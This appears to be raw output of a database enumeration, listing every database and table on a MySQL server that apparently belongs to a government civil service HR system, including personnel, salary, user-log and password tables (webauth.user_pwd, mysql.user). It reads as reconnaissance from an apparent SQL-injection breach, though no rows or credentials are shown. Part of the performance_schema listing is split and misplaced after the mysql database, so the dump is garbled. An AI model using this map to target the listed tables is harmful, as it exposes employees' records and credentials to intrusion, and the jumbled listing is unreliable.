| SESSION_STATUS |

| SESSION_VARIABLES |

| STATISTICS |

| TABLES |

| TABLESPACES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+—————————————————-+

 Database: cdcol

+—————————————————-+

| cds |

+—————————————————-+

Database: csc_cdris

+—————————————————-+

| chat |

| tblchat |

| tblmember |

| tbloffice |

| tblref_author |

| tblref_category |

| tblref_subcat |

| tblref_subcat_topic |

| tblref_topic |

| tblref_type |

| tblresource_master |

| tblusers |

| vw_resource_master |

| vw_subcat_category |

| vw_subcat_topics |

| vw_type_category |

| vw_user_accomplishment |

| vw_user_accomplishment_withtype |

+—————————————————-+

Database: csc_guestchat

+—————————————————-+

| frei_banned_users |

| frei_chat |

| frei_config |

| frei_groupchat |

| frei_rooms |

| frei_session |

| frei_smileys |

| frei_video_session |

| frei_webrtc |

+—————————————————-+
Database: performance_schema

+—————————————————-+

| accounts |

| cond_instances |

| events_stages_current |

| events_stages_history |

| events_stages_history_long |

| events_stages_summary_by_account_by_event_name |

| events_stages_summary_by_host_by_event_name |

| events_stages_summary_by_thread_by_event_name |

| events_stages_summary_by_user_by_event_name |

| events_stages_summary_global_by_event_name |

| events_statements_current |

| events_statements_history |

| events_statements_history_long |

| events_statements_summary_by_account_by_event_name |

| events_statements_summary_by_digest |

| events_statements_summary_by_host_by_event_name |

| events_statements_summary_by_thread_by_event_name |

| events_statements_summary_by_user_by_event_name |

| events_statements_summary_global_by_event_name |

| events_waits_current |

| events_waits_history |

| events_waits_history_long |

| events_waits_summary_by_account_by_event_name |

| events_waits_summary_by_host_by_event_name |

| events_waits_summary_by_instance |

| events_waits_summary_by_thread_by_event_name |

| events_waits_summary_by_user_by_event_name |

| events_waits_summary_global_by_event_name |

| file_instances |

 Database: phpmyadmin

+—————————————————-+

| pma_bookmark |

| pma_column_info |

| pma_designer_coords |

| pma_history |

| pma_pdf_pages |

| pma_recent |

| pma_relation |

| pma_table_coords |

| pma_table_info |

| pma_table_uiprefs |

| pma_tracking |

| pma_userconfig |

+—————————————————-+

Database: webauth

+—————————————————-+

| user_pwd |

+—————————————————-+
Database: csc_ighrsdb

+—————————————————-+

| female_names |

| female_names_copy |

| frei_banned_users |

| frei_chat |

| frei_config |

| frei_groupchat |

| frei_rooms |

| frei_session |

| frei_smileys |

| frei_video_session |

| frei_webrtc |

| male_names |

| ref_2020dashboardsummary |

| ref_2020inventorysummary |

| ref_2021dashboardsummary |

| ref_2021inventorysummary |

| ref_2021inventorysummary_asof_aug16 |

| ref_2021inventorysummary_byage_mar2021 |

| ref_2021plantilapersonnel_asofaug312021 |

| tbl_agency_offices |

| tbl_agencyaccounts |

| tbl_agencyhrmo |

| tbl_agencyinventory |

| tbl_agencyinventory_archive |

| tbl_agencyinventory_logs |

| tbl_agencyinventory_plantilla |

| tbl_agencyinventory_plantilla_archive |

| tbl_agencyinventory_plantilla_byage |

| tbl_agencyinventory_tmp |

| tbl_branch_office |

| tbl_cscofficelookup |

| tbl_dashboardsummary |

| tbl_dashboardsummary_archive |

| tbl_dashboardsummary_plantilla |

| tbl_dashboardsummary_plantilla_archive |

| tbl_job_grade |

| tbl_personnel |

| tbl_personnel2 |

| tbl_personnel_uplink_errors |

| tbl_plantilla |

| tbl_plantilla_jocos |

| tbl_plantilla_jocos_copy |

| tbl_plantilla_jocos_hist |

| tbl_plantilla_logs |

| tbl_plantilla_mod_login |

| tbl_plantilla_ncareer |

| tbl_plantilla_ncareer_hist |

| tbl_plantilla_uplink_errors |

| tbl_plmonitoring_dump |

| tbl_pm_accessed |

| tbl_pos_annotations |

| tbl_position |

| tbl_resourcefile |

| tbl_salary_grade |

| tbl_salary_grade_2016 |

| tbl_salary_grade_2017 |

| tbl_salary_grade_2018 |

| tbl_salary_grade_2019 |

| tbl_salary_grade_2020 |

| tbl_seqref |

| tbl_servicecounter |

| tbl_settings |

| tbl_upload_interrupt |

| tbl_uploadfile |

| tbl_userlogs |

| tbl_version_update |

| tblref_agencyaddress |

| tblref_eligibility |

| tblusers |

| vw_agencyaccounts |

| vw_agencyhrmo_accts |

| vw_agencyinventory |

| vw_agencyinventory_archive |

| vw_agencyinventory_dtl_rpt |

| vw_agencyinventory_gender |

| vw_agencyinventory_logs |

| vw_agencyinventory_plantilla_dtl_rpt |

| vw_agencyinventory_plantilla_dtl_rpt_age |

| vw_agencyinventory_rpt |

| vw_agencyinventory_summary |

| vw_agencyinventory_summary2 |

| vw_agencyinventory_summary3_plantilla |

| vw_agencyinventory_summary4_plantilla |

| vw_cscfoaccounts |

| vw_cscroaccounts |

| vw_personnel_manager |

| vw_plantilla_noncareer |

| vw_plantilla_of_personnel |

| vw_plantilla_personnel |

| vw_plantilla_query |

| vw_plantilla_sec_uploading_count |

| vw_userlog_monthly |

| vw_userlogs |

+—————————————————-+

Database: mysql

+—————————————————-+

| user |

| columns_priv |

| db |

| event |

| func |

| general_log |

| help_category |

| help_keyword |

| help_relation |

| help_topic |

| innodb_index_stats |

| innodb_table_stats |

| ndb_binlog_index |

| plugin |

| proc |

| procs_priv |

| proxies_priv |

| servers |

| slave_master_info |

| slave_relay_log_info |

| slave_worker_info |

| slow_log |

| tables_priv |

| time_zone |

| time_zone_leap_second |

| time_zone_name |

| time_zone_transition |

| time_zone_transition_type |

+—————————————————-+

| file_summary_by_event_name |

| file_summary_by_instance |

| host_cache |

| hosts |

| mutex_instances |

| objects_summary_global_by_type |

| performance_timers |

| rwlock_instances |

| session_account_connect_attrs |

| session_connect_attrs |

| setup_actors |

| setup_consumers |

| setup_instruments |

| setup_objects |

| setup_timers |

| socket_instances |

| socket_summary_by_event_name |

| socket_summary_by_instance |

| table_io_waits_summary_by_index_usage |

| table_io_waits_summary_by_table |

| table_lock_waits_summary_by_table |

| threads |

| users |

+—————————————————-+

 Database: csc_ighrsdb_aug312020

+—————————————————-+

| female_names |

| female_names_copy |

| frei_banned_users |

| frei_chat |

| frei_config |

| frei_groupchat |

| frei_rooms |

| frei_session |

| frei_smileys |

| frei_video_session |

| frei_webrtc |

| male_names |

| rpt_dashboardsummary_asof08312020 |

| rpt_dashboardsummary_asofjuly10 |

| rpt_dashboardsummary_asofjuly13 |

| rpt_inventorysummary_asof08312020 |

| rpt_inventorysummary_asofjuly10 |

| rpt_inventorysummary_asofjuly13 |

| tbl_agency_offices |

| tbl_agencyaccounts |

| tbl_agencyhrmo |

| tbl_agencyinventory |

| tbl_agencyinventory_archive |

| tbl_agencyinventory_logs |

| tbl_agencyinventory_plantilla |

| tbl_agencyinventory_plantilla_archive |

| tbl_agencyinventory_plantilla_withage |

| tbl_agencyinventory_tmp |

| tbl_branch_office |

| tbl_cscofficelookup |

| tbl_dashboardsummary |

| tbl_dashboardsummary_archive |

| tbl_dashboardsummary_plantilla |

| tbl_dashboardsummary_plantilla_archive |

| tbl_job_grade |

| tbl_personnel |

| tbl_personnel2 |

| tbl_personnel_uplink_errors |

| tbl_plantilla |

| tbl_plantilla_jocos |

| tbl_plantilla_jocos_copy |

| tbl_plantilla_jocos_hist |

| tbl_plantilla_logs |

| tbl_plantilla_mod_login |

| tbl_plantilla_ncareer |

| tbl_plantilla_ncareer_hist |

| tbl_plantilla_uplink_errors |

| tbl_plmonitoring_dump |

| tbl_pm_accessed |

| tbl_pos_annotations |

| tbl_position |

| tbl_resourcefile |

| tbl_salary_grade |

| tbl_salary_grade_2016 |

| tbl_salary_grade_2017 |

| tbl_salary_grade_2018 |

| tbl_salary_grade_2019 |

| tbl_salary_grade_2020 |

| tbl_seqref |

| tbl_servicecounter |

| tbl_settings |

| tbl_upload_interrupt |

| tbl_uploadfile |

| tbl_userlogs |

| tbl_version_update |

| tblref_agencyaddress |

| tblref_eligibility |

| tblusers |

| vw_agencyaccounts |

| vw_agencyhrmo_accts |

| vw_agencyinventory |

| vw_agencyinventory_archive |

| vw_agencyinventory_dtl_rpt |

| vw_agencyinventory_gender |

| vw_agencyinventory_logs |

| vw_agencyinventory_plantilla_dtl_rpt |

| vw_agencyinventory_rpt |

| vw_agencyinventory_summary |

| vw_agencyinventory_summary2 |

| vw_agencyinventory_summary3_plantilla |

| vw_cscfoaccounts |

| vw_cscroaccounts |

| vw_plantilla_noncareer |

| vw_plantilla_of_personnel |

| vw_plantilla_personnel |

| vw_plantilla_query |

| vw_plantilla_sec_uploading_count |

| vw_userlog_monthly |

| vw_userlogs |

+—————————————————-+

Database: csc_lookupdb

+—————————————————-+

| vw\x1f_agencymaster2 |

| agency_reference |

| area_reference |

| area_type_reference |

| district_reference |

| eligibility_reference |

| level_reference |

| municipality_reference |

| pos_status_reference |

| position_reference |

| position_reference_copy |

| position_reference_nongovt |

| province_reference |

| salary_grade_reference |

| status_reference |

| tbl_citylookup |

| tbl_cscofficelookup |

| tbl_eligibilitytype |

| tbl_examcenterlookup |

| tbl_zipcode |

| tbldibar_reflookup |

| tblref_agencydept |

| tblref_agencydept_nongovt |

| tblref_agencyhrmo |

| tblref_agencyro |

| tblref_agencysector |

| tblref_agencytype |

| tblref_bloodtype |

| tblref_citizenship |

| tblref_civilstatus |

| tblref_deptagency_tmp |

| tblref_educcourses |

| tblref_educlevel |

| tblref_educschool |

| tblref_empstatus |

| tblref_regions |

| tblref_religion |

| tblref_trainingprovider |

| tblref_trainingtitle |

| vw_agencyhrmo |

| vw_agencylookup |

| vw_agencymaster |

| vw_agencyromaster |

| vw_agencysector_type |

+—————————————————-+